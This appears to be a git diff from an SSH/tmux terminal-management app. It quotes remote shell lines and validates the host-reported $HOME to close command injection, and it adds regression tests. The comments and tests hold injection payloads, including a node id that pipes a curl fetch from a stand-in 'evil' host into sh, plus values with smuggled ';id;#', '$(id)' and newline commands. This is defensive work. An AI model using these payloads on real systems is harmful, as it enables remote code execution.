+  replAfter: "n1$'",
+  replDollar: 'n1$$'
+}
+
+describe('REAL sh: a payload node id is one literal argument, never command structure', () => {
+  for (const [name, payload] of Object.entries(PAYLOADS)) {
+    it(`${name}: ${JSON.stringify(payload)}`, () => {
+      const { argv, markers, extraStdout } = runReal(build(payload))
+      expect(markers, `a canary EXECUTED for ${name}`).toEqual([])
+      expect(extraStdout, `stray stdout for ${name}`).toBe('')
+      expect(argv, `payload was not one literal arg for ${name}`).toContain(`NODETERM_NODE_ID=${payload}`)
+      expect(argv.slice(0, 2)).toEqual(['-L', 'nodeterm-rmt'])
+      expect(argv.filter((a) => a === 'new-session')).toHaveLength(1)
+      expect(argv).toContain('nt-n1')
+      expect(argv).toContain('/home/u')
+    })
+  }
+})
+
+/**
+ * The four vectors an adversarial review proved still landed after the FIRST version of this fix.
+ * Each uses a node id that passes `isSafeNodeId` — the escape rides a different project.json field
+ * — so they are regressions against the splice, not against the id validator.
+ */
+describe('REAL sh: the four vectors that survived the first fix', () => {
+  it('A: node.data.agentId carries the escape, node id is legitimate', () => {
+    expect(isSafeNodeId('term-mabc-3')).toBe(true)
+    const cmd = remoteTmuxPtyArgs(
+      conn,
+      '/s.sock',
+      'nt-term-mabc-3',
+      '/srv/app;id;#',
+      undefined,
+      undefined,
+      remoteHookEnvArgs('/home/u/.nodeterm/hook-endpoint-p1.env', 'term-mabc-3', '1', "claude$'"),
+      '/home/u/.nodeterm/tmux.conf'
+    ).slice(-1)[0]
+    const { argv, markers } = runReal(cmd)
+    expect(markers).toEqual([])
+    expect(argv).toContain('/srv/app;id;#') // the cwd stayed DATA
+  })
+
+  it('B: a remote $HOME that isSafeRemoteHome accepts (and should)', () => {
+    const home = "/home/u$'x"
+    expect(isSafeRemoteHome(home), 'a legal path — the validator is not the defence here').toBe(true)
+    const cmd = remoteTmuxPtyArgs(
+      conn,
+      '/s.sock',
+      'nt-n1',
+      '/srv/app;id;#',
+      undefined,
+      undefined,
+      remoteHookEnvArgs(`${home}/.nodeterm/hook-endpoint-p1.env`, 'term-mabc-3', '1', 'claude'),
+      '/home/u/.nodeterm/tmux.conf'
+    ).slice(-1)[0]
+    const { argv, markers } = runReal(cmd)
+    expect(markers).toEqual([])
+    expect(argv).toContain(`NODETERM_HOOK_ENDPOINT=${home}/.nodeterm/hook-endpoint-p1.env`)
+  })
+
+  it('C: CLAUDE_CONFIG_DIR built from that same $HOME', () => {
+    const dir = remoteAccountConfigDirAbs("/home/u$'x", 'work')
+    const cmd = remoteTmuxPtyArgs(conn, '/s.sock', 'nt-n1', '/srv/app;id;#', undefined, undefined, [
+      ...accountTmuxEnvArgs(dir)
+    ]).slice(-1)[0]
+    const { argv, markers } = runReal(cmd)
+    expect(markers).toEqual([])
+    expect(argv).toContain(`CLAUDE_CONFIG_DIR=${dir}`)
+  })
+
+  it('D: programArgs (a resume session id) in the region after the splice', () => {
+    const cmd = remoteTmuxPtyArgs(
+      conn,
+      '/s.sock',
+      'nt-n1',
+      '/srv/app',
+      'claude',
+      ['--resume', 'sess;id;#'],
+      remoteHookEnvArgs('/ep', 'term-mabc-3', '1', "claude$'")
+    ).slice(-1)[0]
+    const { argv, markers } = runReal(cmd)
+    expect(markers).toEqual([])
+    expect(argv).toContain('sess;id;#')
+  })
+})

--- a/src/core/remote-ssh/control-master.test.ts
+++ b/src/core/remote-ssh/control-master.test.ts
@@ -244,7 +244,11 @@ describe('remoteTmuxPtyArgs', () => {
       '-e', 'NODETERM_NODE_ID=nt-x'
     ])
     const cmd = args[args.length - 1]
-    expect(cmd).toContain('new-session -A -e NODETERM_HOOK_ENDPOINT=/r/ep.env -e NODETERM_NODE_ID=nt-x -s')
+    // Each token is posix-quoted: this is ONE remote shell line, and the pair values carry the raw
+    // node id (see control-master.injection.test.ts for the injection this closes).
+    expect(cmd).toContain(
+      `new-session -A '-e' 'NODETERM_HOOK_ENDPOINT=/r/ep.env' '-e' 'NODETERM_NODE_ID=nt-x' -s`
+    )
   })
   it('threads confPath to remoteTmuxCommand as a `-f` source before new-session', () => {
     const args = remoteTmuxPtyArgs(conn, '/s.sock', 'nt-x', '/srv/app', undefined, undefined, [], '/home/u/.nodeterm/tmux.conf')

--- a/src/core/remote-ssh/control-master.ts
+++ b/src/core/remote-ssh/control-master.ts
@@ -509,6 +509,14 @@ export function remoteTmuxPtyArgs(
 ): string[] {
   let cmd = remoteTmuxCommand({ sessionId, remoteCwd, program, programArgs, socket: RMT_TMUX_SOCKET, confPath })
   if (extraEnv.length)
-    cmd = cmd.replace('new-session -A ', `new-session -A ${extraEnv.map(posixQuote).join(' ')} `)
+    // The replacement is a FUNCTION, not a string. This is load-bearing and not a style choice:
+    // in a STRING replacement `$'`, `` $` ``, `$&` and `$$` are expansion patterns, and `$'`
+    // splices the text FOLLOWING the match — `-s '<session>' -c '<cwd>' '<program>' '<args>'` —
+    // straight INSIDE the single-quoted token being built. That inverts the quote parity of that
+    // copy and un-quotes everything `remoteTmuxCommand` had carefully quoted, so an agent id of
+    // `claude$'` plus a project cwd of `/srv/app;id;#` (both from the same `.nodeterm/project.json`)
+    // was remote code execution EVEN WITH the posixQuote above. A function replacement is never
+    // pattern-expanded, so the quoted bytes land verbatim. See control-master.injection.test.ts.
+    cmd = cmd.replace('new-session -A ', () => `new-session -A ${extraEnv.map(posixQuote).join(' ')} `)
   return ['-t', ...childArgs(conn, controlPath, cmd)]
 }

--- a/src/core/remote-ssh/control-master.ts
+++ b/src/core/remote-ssh/control-master.ts
@@ -485,6 +485,17 @@ export function remoteEndpointFileContents(sock: string, token: string, version:
  * The remote PTY program is `ssh <childArgs> host -t '<remoteTmuxCommand>'`. `extraEnv` is an
  * already-built list of tmux `-e KEY=VALUE` pairs (e.g. from `remoteHookEnvArgs`) spliced into
  * the `new-session` command right after `-A`, mirroring the local tmux `-e` placement.
+ *
+ * SECURITY — every token is `posixQuote`d, including the `-e` flags themselves (quoting a flag is
+ * a no-op to the shell, and hard-coding "even indices are flags" would be an assumption about a
+ * caller's array shape rather than a property of this function). This is NOT decoration: the
+ * result is ONE SHELL LINE handed to the remote user's login shell, and the values here carry the
+ * RAW node id (`NODETERM_NODE_ID`) and the managed-account config dir — both of which come out of
+ * `.nodeterm/project.json`, a file that travels in a cloned or shared repo and is written on
+ * remote hosts. Spliced unquoted (as this did until 2026-08), a node id of
+ * `n1;curl http://evil/x|sh;#` ended the tmux command and ran the rest as the SSH user the moment
+ * the victim opened that node. Everything else in `remoteTmuxCommand` was already quoted; this was
+ * the one gap. See control-master.injection.test.ts.
  */
 export function remoteTmuxPtyArgs(
   conn: SshConnection,
@@ -497,6 +508,7 @@ export function remoteTmuxPtyArgs(
   confPath?: string
 ): string[] {
   let cmd = remoteTmuxCommand({ sessionId, remoteCwd, program, programArgs, socket: RMT_TMUX_SOCKET, confPath })
-  if (extraEnv.length) cmd = cmd.replace('new-session -A ', `new-session -A ${extraEnv.join(' ')} `)
+  if (extraEnv.length)
+    cmd = cmd.replace('new-session -A ', `new-session -A ${extraEnv.map(posixQuote).join(' ')} `)
   return ['-t', ...childArgs(conn, controlPath, cmd)]
 }

--- a/src/main/remote-ssh/remote-hooks.test.ts
+++ b/src/main/remote-ssh/remote-hooks.test.ts
@@ -49,7 +49,7 @@ describe('RemoteHooks.setup', () => {
     // reverse forward binds the ABSOLUTE remote socket (no unexpanded ~).
     expect(joined.some((j) => j.includes('-O forward') && j.includes('/home/u/.nodeterm/hook-p1.sock:127.0.0.1:51234'))).toBe(true)
     // endpoint file written to the absolute PER-PROJECT path, with the absolute sock + token.
-    expect(joined.some((j) => j.includes('cat > /home/u/.nodeterm/hook-endpoint-p1.env'))).toBe(true)
+    expect(joined.some((j) => j.includes(`cat > '/home/u/.nodeterm/hook-endpoint-p1.env'`))).toBe(true)
     expect(
       calls.some(
         (c) =>
@@ -58,8 +58,8 @@ describe('RemoteHooks.setup', () => {
       )
     ).toBe(true)
     // managed script written to the absolute path + config merged with the guarded command.
-    expect(joined.some((j) => j.includes('cat > /home/u/.nodeterm/agent-hooks/claude.sh'))).toBe(true)
-    expect(joined.some((j) => j.includes('cat > /home/u/.claude/settings.json'))).toBe(true)
+    expect(joined.some((j) => j.includes(`cat > '/home/u/.nodeterm/agent-hooks/claude.sh'`))).toBe(true)
+    expect(joined.some((j) => j.includes(`cat > '/home/u/.claude/settings.json'`))).toBe(true)
     expect(calls.some((c) => (c.stdin ?? '').includes('--unix-socket'))).toBe(true)
     // The merged command guards on the script still existing — a removed ~/.nodeterm must not
     // make every prompt fail the hook (a non-zero UserPromptSubmit hook blocks the prompt).
@@ -168,8 +168,44 @@ describe('RemoteHooks.setup', () => {
     expect(b?.endpointPath).toBe('/home/u/.nodeterm/hook-endpoint-ssh-browse-xyz.env')
     // the browse writes ITS OWN endpoint file, never the real project's.
     const joined = calls.map((c) => c.args.join(' '))
-    expect(joined.some((j) => j.includes('cat > /home/u/.nodeterm/hook-endpoint-ssh-browse-xyz.env'))).toBe(true)
+    expect(joined.some((j) => j.includes(`cat > '/home/u/.nodeterm/hook-endpoint-ssh-browse-xyz.env'`))).toBe(true)
     expect(joined.some((j) => j.includes('hook-endpoint-proj.env'))).toBe(false)
+  })
+})
+
+/**
+ * SECURITY — the remote `$HOME` is a HOST ANSWER, i.e. data, not truth. `setup()` splices it into
+ * `mkdir -p <remoteDir> && rm -f <sock>` and into every `cat > <config>`, and those are remote
+ * SHELL LINES. A `$HOME` carrying a newline therefore appends a second command; a `$HOME` carrying
+ * a space silently breaks the install (the unquoted `mkdir` word-splits). Two layers, matching the
+ * fix in `remoteTmuxPtyArgs`: validate the answer, then quote every path built from it. Same
+ * fail-open direction the surrounding code already takes — an unusable answer returns null and the
+ * host simply runs without hooks.
+ */
+describe('RemoteHooks.setup — a hostile remote $HOME', () => {
+  it('returns null and interpolates NOTHING when $HOME carries a newline', async () => {
+    const { rh, conn, runs } = harness({ responses: { $HOME: '/home/u\nid > /tmp/pwned' } })
+    const res = await rh.setup('p1', conn, '/s.sock', { port: 51234, token: 'tok', version: '1' })
+    expect(res).toBeNull()
+    // Nothing beyond the probe itself may have run — no forward, no mkdir, no write.
+    expect(runs.some((r) => r.cmd.includes('id > /tmp/pwned'))).toBe(false)
+    expect(runs.some((r) => r.cmd.includes('mkdir'))).toBe(false)
+    expect(runs.some((r) => r.cmd.includes('-O forward'))).toBe(false)
+  })
+
+  it('quotes every path it builds from $HOME, so a home with a space still installs', async () => {
+    const { rh, conn, runs } = harness({ responses: { $HOME: '/Users/Enes K' } })
+    const res = await rh.setup('p1', conn, '/s.sock', { port: 51234, token: 'tok', version: '1' })
+    expect(res?.endpointPath).toBe('/Users/Enes K/.nodeterm/hook-endpoint-p1.env')
+    const joined = runs.map((r) => r.cmd)
+    expect(joined.some((j) => j.includes(`mkdir -p '/Users/Enes K/.nodeterm'`))).toBe(true)
+    expect(joined.some((j) => j.includes(`cat > '/Users/Enes K/.nodeterm/hook-endpoint-p1.env'`))).toBe(true)
+    expect(joined.some((j) => j.includes(`cat > '/Users/Enes K/.claude/settings.json'`))).toBe(true)
+    // No path derived from $HOME survives UNQUOTED in any remote SHELL LINE (the last argv element
+    // of an ssh child is the command the remote shell parses; the `-R` forward spec is an ssh
+    // OPTION, not a shell word, so it is excluded by construction).
+    const shellLines = runs.map((r) => r.args[r.args.length - 1])
+    expect(shellLines.some((line) => /(?<!')\/Users\/Enes K/.test(line))).toBe(false)
   })
 })
 

--- a/src/main/remote-ssh/remote-hooks.test.ts
+++ b/src/main/remote-ssh/remote-hooks.test.ts
@@ -1,5 +1,7 @@
+import { execFileSync } from 'child_process'
 import { describe, expect, it, vi } from 'vitest'
-import { RemoteHooks } from './remote-hooks'
+import { RemoteHooks, openCodeInstructionsTarget } from './remote-hooks'
+import { isSafeRemoteHome } from '../../core/remote-safety'
 
 const conn = { host: 'h', user: 'u' }
 
@@ -209,6 +211,77 @@ describe('RemoteHooks.setup — a hostile remote $HOME', () => {
   })
 })
 
+/**
+ * SECURITY — the opencode instructions target is the ONE remote path that must stay
+ * shell-expandable (`$XDG_CONFIG_HOME` belongs to the HOST), so it cannot be a quoted literal like
+ * its codex/gemini siblings. Written the obvious way it interpolated the host-reported `$HOME`
+ * inside DOUBLE quotes, where `$` and backticks are still live — and `isSafeRemoteHome` accepts
+ * `/home/u$(id)`, correctly, because that is a legal path. Executed through a real `/bin/sh`: the
+ * expression must stay ONE argument and must never run anything.
+ */
+describe('RemoteHooks — the opencode XDG path expression', () => {
+  const HOSTILE = '/home/u$(id)`id`;id;#'
+
+  /** `set --` so the shell reports how many WORDS the expression became, and what the first is. */
+  const probe = (home: string, env: Record<string, string> = {}): string => {
+    const { prelude, pathExpr } = openCodeInstructionsTarget(home)
+    return execFileSync('/bin/sh', ['-c', `${prelude}set -- ${pathExpr}; echo "ARGC=$#|$1"`], {
+      encoding: 'utf8',
+      env: { PATH: '/usr/bin:/bin', ...env }
+    }).trim()
+  }
+
+  it('a hostile $HOME stays inert and the expression stays ONE word (real /bin/sh)', () => {
+    expect(isSafeRemoteHome(HOSTILE), 'a legal path — the validator is not the defence here').toBe(true)
+    expect(probe(HOSTILE)).toBe(`ARGC=1|${HOSTILE}/.config/opencode/AGENTS.md`)
+  })
+
+  it("still honours the HOST's $XDG_CONFIG_HOME, including one containing a space", () => {
+    expect(probe('/home/u', { XDG_CONFIG_HOME: '/o p/cfg' })).toBe('ARGC=1|/o p/cfg/opencode/AGENTS.md')
+    expect(probe('/home/u')).toBe('ARGC=1|/home/u/.config/opencode/AGENTS.md')
+  })
+
+  for (const [what, install] of [
+    ['canvas control', (rh: RemoteHooks, c: typeof conn) => rh.installCanvasControl(c, '/s.sock', HOSTILE)],
+    ['context link', (rh: RemoteHooks, c: typeof conn) => rh.installContextLink(c, '/s.sock', HOSTILE)]
+  ] as const) {
+    it(`${what} routes the opencode target through that safe form`, async () => {
+      const { rh, conn: c, runs } = harness()
+      await install(rh, c)
+      const lines = runs
+        .map((r) => r.args[r.args.length - 1])
+        .filter((l) => l.includes('opencode/AGENTS.md'))
+      expect(lines.length).toBeGreaterThan(0)
+      for (const line of lines) {
+        // The untrusted half is bound to a single-quoted shell variable; it never appears raw
+        // inside the double-quoted expansion, where `$`/backticks would still be live.
+        expect(line).toContain(`NT_H='${HOSTILE}'`)
+        expect(line).toContain('"${XDG_CONFIG_HOME:-$NT_H/.config}/opencode/AGENTS.md"')
+        expect(line).not.toContain(`{XDG_CONFIG_HOME:-${HOSTILE}`)
+      }
+    })
+  }
+})
+
+describe('RemoteHooks.ensureFullscreenTui — the fourth $(dirname …) site', () => {
+  it('quotes the substitution, so a home with a space gets ONE mkdir argument', async () => {
+    // Unquoted, `$(dirname '/Users/Enes Kirca/.claude/settings.json')` word-splits into two mkdir
+    // args (measured ARGC=2): junk directories, then the quoted `cat >` fails and the catch
+    // swallows it — fullscreen-TUI silently never written for any macOS user with a spaced home.
+    const { rh, conn: c, runs } = harness({ responses: { 'settings.json': '{}' } })
+    await rh.ensureFullscreenTui(c, '/s.sock', '/Users/Enes Kirca')
+    const write = runs.map((r) => r.args[r.args.length - 1]).find((l) => l.includes('mkdir -p'))
+    expect(write).toBeTruthy()
+    expect(write).toContain(`mkdir -p "$(dirname '/Users/Enes Kirca/.claude/settings.json')"`)
+    const argc = execFileSync(
+      '/bin/sh',
+      ['-c', `set -- "$(dirname '/Users/Enes Kirca/.claude/settings.json')"; echo "ARGC=$#|$1"`],
+      { encoding: 'utf8' }
+    ).trim()
+    expect(argc).toBe('ARGC=1|/Users/Enes Kirca/.claude')
+  })
+})
+
 describe('RemoteHooks.setup — grok', () => {
   // The host's $GROK_HOME is deliberately a path the `$HOME/.grok` fallback could NEVER produce.
   // With the two byte-identical (`$HOME: /home/dev` + `GROK_HOME: /home/dev/.grok`) the whole
@@ -387,7 +460,10 @@ describe('RemoteHooks.installCanvasControl', () => {
     // the desktop's XDG_CONFIG_HOME says nothing about the host's.
     expect(joined.some((j) => j.includes('/home/u/.codex/AGENTS.md'))).toBe(true)
     expect(joined.some((j) => j.includes('/home/u/.gemini/GEMINI.md'))).toBe(true)
-    expect(joined.some((j) => j.includes('${XDG_CONFIG_HOME:-/home/u/.config}/opencode/AGENTS.md'))).toBe(true)
+    // …with the remote $HOME bound to a shell variable first, so it is never live inside the
+    // double-quoted expansion (see "the opencode XDG path expression" below).
+    expect(joined.some((j) => j.includes(`NT_H='/home/u'`))).toBe(true)
+    expect(joined.some((j) => j.includes('${XDG_CONFIG_HOME:-$NT_H/.config}/opencode/AGENTS.md'))).toBe(true)
     expect(calls.some((c) => (c.stdin ?? '').includes('nodeterm:manage-canvas:start'))).toBe(true)
     // no unexpanded tilde survives in any remote path.
     expect(joined.some((j) => j.includes('~/'))).toBe(false)

--- a/src/main/remote-ssh/remote-hooks.ts
+++ b/src/main/remote-ssh/remote-hooks.ts
@@ -8,6 +8,7 @@
 import { childArgs, hookForwardArgs, hookForwardCancelArgs, remoteEndpointFileContents } from '../../core/remote-ssh/control-master'
 import { CLAUDE_HOOK_EVENTS, GEMINI_HOOK_EVENTS, GROK_HOOK_EVENTS } from '@shared/agents/hook-events'
 import { GROK_HOOK_FILE, isSafeRemoteGrokHome } from '../../core/agents/grok-paths'
+import { isSafeRemoteHome } from '../../core/remote-safety'
 import { buildManagedScript } from '../../core/agents/hooks/managed-script'
 
 /**
@@ -91,8 +92,14 @@ export class RemoteHooks {
     try {
       // 0. resolve the remote $HOME once → build all remote paths absolute (no unexpanded ~).
       const { code, stdout } = await this.r.run(childArgs(conn, controlPath, 'printf %s "$HOME"'))
+      // Trim at the READ site (`printf %s` emits no newline, but a login-shell banner or a shell
+      // wrapper can add one), then VALIDATE: every path below is spliced into a remote SHELL LINE,
+      // so a `$HOME` carrying a newline would append a second command to it. The host's answer is
+      // data, not truth. Fail-open in the direction this whole method already takes — an unusable
+      // answer means no hooks, never a half-built remote path. (Layer two is the quoting below;
+      // both are needed: the validator bounds what can arrive, the quoting bounds what it can do.)
       const home = stdout.trim()
-      if (code !== 0 || !home) return null // fail-open: nothing else would work
+      if (code !== 0 || !isSafeRemoteHome(home)) return null // fail-open: nothing else would work
       const remoteDir = `${home}/.nodeterm`
       const sock = `${remoteDir}/hook-${projectId}.sock`
       // PER-PROJECT endpoint file. The sock is already per-project, but the endpoint file used to
@@ -117,7 +124,9 @@ export class RemoteHooks {
           // Our own spec may already be registered (a reconnect this run) — clear it first.
           await this.r.run(hookForwardCancelArgs(conn, controlPath, sock, hook.port)).catch(() => {})
         }
-        await this.r.run(childArgs(conn, controlPath, `mkdir -p ${remoteDir} && rm -f ${sock}`))
+        await this.r.run(
+          childArgs(conn, controlPath, `mkdir -p ${posixQuote(remoteDir)} && rm -f ${posixQuote(sock)}`)
+        )
         const fwd = await this.r.run(hookForwardArgs(conn, controlPath, sock, hook.port))
         if (fwd.code !== 0) continue
         verified = await this.verifyTunnel(conn, controlPath, sock, hook.token)
@@ -132,7 +141,7 @@ export class RemoteHooks {
       // 2. remote endpoint file (0600 via umask) — written only after the tunnel proved live,
       // so sessions are never pointed at a socket that answers nothing.
       await this.r.run(
-        childArgs(conn, controlPath, `umask 077; cat > ${endpoint}`),
+        childArgs(conn, controlPath, `umask 077; cat > ${posixQuote(endpoint)}`),
         remoteEndpointFileContents(sock, hook.token, hook.version)
       )
       // 3. install the managed hook for each JSON agent (script + merged config).
@@ -140,10 +149,16 @@ export class RemoteHooks {
         const script = `${remoteDir}/agent-hooks/${t.agentId}.sh`
         const config = `${home}/${t.config}`
         await this.r.run(
-          childArgs(conn, controlPath, `mkdir -p ${remoteDir}/agent-hooks && cat > ${script} && chmod 755 ${script}`),
+          childArgs(
+            conn,
+            controlPath,
+            `mkdir -p ${posixQuote(`${remoteDir}/agent-hooks`)} && cat > ${posixQuote(script)} && chmod 755 ${posixQuote(script)}`
+          ),
           buildManagedScript(t.agentId, REMOTE_IDENTITY_ROOT)
         )
-        const { stdout: cfgRaw } = await this.r.run(childArgs(conn, controlPath, `cat ${config} 2>/dev/null || echo '{}'`))
+        const { stdout: cfgRaw } = await this.r.run(
+          childArgs(conn, controlPath, `cat ${posixQuote(config)} 2>/dev/null || echo '{}'`)
+        )
         let cfg: HookSettings = {}
         try {
           cfg = JSON.parse(cfgRaw || '{}') as HookSettings
@@ -152,7 +167,10 @@ export class RemoteHooks {
         }
         const merged = mergeManagedHook(cfg, buildManagedHookCommand(script), t.events)
         await this.r.run(
-          childArgs(conn, controlPath, `mkdir -p $(dirname ${config}) && cat > ${config}`),
+          // `$(dirname …)` is itself QUOTED (same reason as installGrokRemote): a home with a
+          // space would otherwise word-split into two mkdir args, the directory would never be
+          // created, and the correctly-quoted `cat >` would then fail — silently, fail-open.
+          childArgs(conn, controlPath, `mkdir -p "$(dirname ${posixQuote(config)})" && cat > ${posixQuote(config)}`),
           JSON.stringify(merged, null, 2)
         )
       }

--- a/src/main/remote-ssh/remote-hooks.ts
+++ b/src/main/remote-ssh/remote-hooks.ts
@@ -49,6 +49,30 @@ function dirnameOf(p: string): string {
   return i > 0 ? p.slice(0, i) : '/'
 }
 
+/**
+ * The remote opencode instructions path, as a `{ prelude, pathExpr }` pair for
+ * `mergeRemoteInstructions`.
+ *
+ * opencode is XDG-respecting and the DESKTOP's `$XDG_CONFIG_HOME` says nothing about the host, so
+ * this one target must stay expandable BY THE REMOTE SHELL — it cannot be a `posixQuote`d literal
+ * like its codex/gemini siblings. That is what made it dangerous: the obvious spelling,
+ * `"${XDG_CONFIG_HOME:-<remoteHome>/.config}/…"`, interpolates the host-reported `$HOME` inside
+ * DOUBLE quotes, where `$` and backticks are still live — so a `$HOME` of `/home/u$(id)` (which
+ * `isSafeRemoteHome` accepts, and should: it is a legal path) executed on the host.
+ *
+ * The fix binds the untrusted half to a shell VARIABLE first. A parameter expansion's RESULT is
+ * not re-expanded, so `"$NT_H"` is inert no matter what bytes it holds, while
+ * `${XDG_CONFIG_HOME:-…}` keeps its fallback semantics. Verified against real `/bin/sh`: the
+ * payload never runs, and the whole expression stays ONE argument (ARGC=1) with the variable set,
+ * unset, and holding a space.
+ */
+export function openCodeInstructionsTarget(remoteHome: string): { prelude: string; pathExpr: string } {
+  return {
+    prelude: `NT_H=${posixQuote(remoteHome)}; `,
+    pathExpr: `"\${XDG_CONFIG_HOME:-$NT_H/.config}/opencode/AGENTS.md"`
+  }
+}
+
 export interface RemoteRunner {
   /** Run one ssh child command (over the master); optional stdin written to the child. */
   run: (args: string[], stdin?: string) => Promise<{ code: number; stdout: string }>
@@ -416,13 +440,15 @@ export class RemoteHooks {
       // the desktop merges into their global instruction files. The opencode path is expanded by
       // the REMOTE shell (it is XDG-respecting and the local value says nothing about the host).
       const block = buildCanvasControlInstructions(shim)
-      const targets = [
-        posixQuote(`${remoteHome}/.codex/AGENTS.md`),
-        posixQuote(`${remoteHome}/.gemini/GEMINI.md`),
-        `"\${XDG_CONFIG_HOME:-${remoteHome}/.config}/opencode/AGENTS.md"`
+      // codex/gemini are plain quoted literals; opencode must stay shell-expandable and so
+      // carries a prelude that binds the untrusted $HOME to a variable (see the helper).
+      const targets: { pathExpr: string; prelude?: string }[] = [
+        { pathExpr: posixQuote(`${remoteHome}/.codex/AGENTS.md`) },
+        { pathExpr: posixQuote(`${remoteHome}/.gemini/GEMINI.md`) },
+        openCodeInstructionsTarget(remoteHome)
       ]
-      for (const target of targets) {
-        await this.mergeRemoteInstructions(conn, controlPath, target, block, mergeCanvasControlBlock)
+      for (const t of targets) {
+        await this.mergeRemoteInstructions(conn, controlPath, t.pathExpr, block, mergeCanvasControlBlock, t.prelude)
       }
     } catch {
       /* fail-open: the remote agent simply runs without canvas control */
@@ -478,13 +504,15 @@ export class RemoteHooks {
         buildContextLinkSkillBody(shim)
       )
       const block = buildLinkedContextInstructions(shim)
-      const targets = [
-        posixQuote(`${remoteHome}/.codex/AGENTS.md`),
-        posixQuote(`${remoteHome}/.gemini/GEMINI.md`),
-        `"\${XDG_CONFIG_HOME:-${remoteHome}/.config}/opencode/AGENTS.md"`
+      // codex/gemini are plain quoted literals; opencode must stay shell-expandable and so
+      // carries a prelude that binds the untrusted $HOME to a variable (see the helper).
+      const targets: { pathExpr: string; prelude?: string }[] = [
+        { pathExpr: posixQuote(`${remoteHome}/.codex/AGENTS.md`) },
+        { pathExpr: posixQuote(`${remoteHome}/.gemini/GEMINI.md`) },
+        openCodeInstructionsTarget(remoteHome)
       ]
-      for (const target of targets) {
-        await this.mergeRemoteInstructions(conn, controlPath, target, block, mergeInstructionsBlock)
+      for (const t of targets) {
+        await this.mergeRemoteInstructions(conn, controlPath, t.pathExpr, block, mergeInstructionsBlock, t.prelude)
       }
     } catch {
       /* fail-open: the remote agent simply runs without context link */
@@ -543,22 +571,27 @@ export class RemoteHooks {
   /** Read-merge-write one marker-delimited instructions block at a remote path EXPRESSION
    *  (already quoted / shell-expandable). Everything outside the markers is preserved — including
    *  the OTHER feature's block, which is why the merge function is a parameter: canvas control and
-   *  context link own different markers in the same files. */
+   *  context link own different markers in the same files.
+   *
+   *  `prelude` is shell prepended to BOTH commands — it exists so a caller can bind an untrusted
+   *  value (the host-reported `$HOME`) to a shell VARIABLE once and then refer to it as `$NT_H`
+   *  inside an expression that must stay shell-expandable. See `openCodeInstructionsTarget`. */
   private async mergeRemoteInstructions(
     conn: SshConnection,
     controlPath: string,
     pathExpr: string,
     block: string,
-    merge: (existing: string, block: string) => string
+    merge: (existing: string, block: string) => string,
+    prelude = ''
   ): Promise<void> {
     try {
       const { stdout: existing } = await this.r.run(
-        childArgs(conn, controlPath, `cat ${pathExpr} 2>/dev/null || true`)
+        childArgs(conn, controlPath, `${prelude}cat ${pathExpr} 2>/dev/null || true`)
       )
       const merged = merge(existing, block)
       if (merged === existing) return
       await this.r.run(
-        childArgs(conn, controlPath, `mkdir -p "$(dirname ${pathExpr})" && cat > ${pathExpr}`),
+        childArgs(conn, controlPath, `${prelude}mkdir -p "$(dirname ${pathExpr})" && cat > ${pathExpr}`),
         merged
       )
     } catch {
@@ -608,7 +641,12 @@ export class RemoteHooks {
       const { config: next, changed } = ensureFullscreenTui(cfg)
       if (!changed) return // key already present (any value) → never overwrite the user's `/tui`
       await this.r.run(
-        childArgs(conn, controlPath, `mkdir -p $(dirname ${posixQuote(config)}) && cat > ${posixQuote(config)}`),
+        // `$(dirname …)` QUOTED, like the other three sites. Unquoted, a home with a space
+        // (`/Users/Enes Kirca`) word-splits the substitution into two mkdir args — measured
+        // ARGC=2 — so junk directories are created, the correctly-quoted `cat >` then fails, and
+        // the catch below swallows it. Symptom: fullscreen-TUI silently never written for any
+        // macOS user whose home has a space in it.
+        childArgs(conn, controlPath, `mkdir -p "$(dirname ${posixQuote(config)})" && cat > ${posixQuote(config)}`),
         JSON.stringify(next, null, 2)
       )
     } catch {

--- a/src/main/remote-ssh/ssh-project.test.ts
+++ b/src/main/remote-ssh/ssh-project.test.ts
@@ -168,6 +168,55 @@ describe('SshProjectManager', () => {
     expect(calls.some((c) => c.args.join(' ').includes(`source-file '/home/u/.nodeterm/tmux.conf'`))).toBe(true)
   })
 
+  /**
+   * SECURITY — the remote `$HOME` is a HOST ANSWER, i.e. data. Both places `ssh-project` reads it
+   * validate it (`isSafeRemoteHome`) before it becomes a remote path: `connect`, where it steers
+   * the tmux.conf write AND is retained as `remoteHome` (which the PTY manager then splices into a
+   * tmux `-e CLAUDE_CONFIG_DIR=…` pair), and `uploadFile`, which resolves it on demand.
+   *
+   * These two sites had NO test in the first version of this fix — reverting them left the suite
+   * green, which made the mutation claim wrong. That is what these pin.
+   */
+  const mgrWithHome = (home: string) => {
+    const calls: { args: string[]; stdin?: string }[] = []
+    const run = vi.fn(async (args: string[], stdin?: string) => {
+      calls.push({ args, stdin })
+      return args.join(' ').includes('printf %s') ? { code: 0, stdout: home } : { code: 0, stdout: '' }
+    })
+    const mgr = new SshProjectManager({
+      userDataDir: '/ud',
+      spawnMaster: vi.fn(() => ({ kill: vi.fn(), on: vi.fn() })),
+      run,
+      runScp: vi.fn(async () => ({ code: 0 })),
+      getHook: () => ({ port: 1, token: 't', version: '1' }),
+      onStatus: vi.fn()
+    })
+    return { mgr, calls }
+  }
+
+  it('connect REFUSES a remote $HOME carrying a newline (no path built, nothing retained)', async () => {
+    const { mgr, calls } = mgrWithHome('/home/u\nid > /tmp/pwned')
+    const { tmuxConfPath } = await mgr.connect('p1', conn)
+    // Fail-open: the features needing an absolute home are off, the connection itself still works.
+    expect(tmuxConfPath).toBeUndefined()
+    expect(mgr.remoteHomeFor('p1')).toBeUndefined()
+    // and the hostile bytes reached no remote command line.
+    expect(calls.some((c) => c.args.join(' ').includes('id > /tmp/pwned'))).toBe(false)
+  })
+
+  it('connect ACCEPTS a home with a space (the validator must not break real macOS homes)', async () => {
+    const { mgr } = mgrWithHome('/Users/Enes Kirca')
+    const { tmuxConfPath } = await mgr.connect('p1', conn)
+    expect(tmuxConfPath).toBe('/Users/Enes Kirca/.nodeterm/tmux.conf')
+    expect(mgr.remoteHomeFor('p1')).toBe('/Users/Enes Kirca')
+  })
+
+  it('uploadFile REFUSES a probed $HOME carrying a newline', async () => {
+    const { mgr } = mgrWithHome('/home/u\nid')
+    await mgr.connect('p1', conn) // connect also refuses it, so upload must re-probe and refuse too
+    expect(await mgr.uploadFile('p1', '/local/f.png', 'f.png')).toBeNull()
+  })
+
   it('connect leaves tmuxConfPath undefined when the remote conf write fails (no -f to a missing conf)', async () => {
     // The runner resolves (does not throw) on a non-zero remote exit. Fail the `cat >`/mkdir write
     // with code 1 while letting the $HOME probe succeed so remoteHome resolves, this isolates the

--- a/src/main/remote-ssh/ssh-project.ts
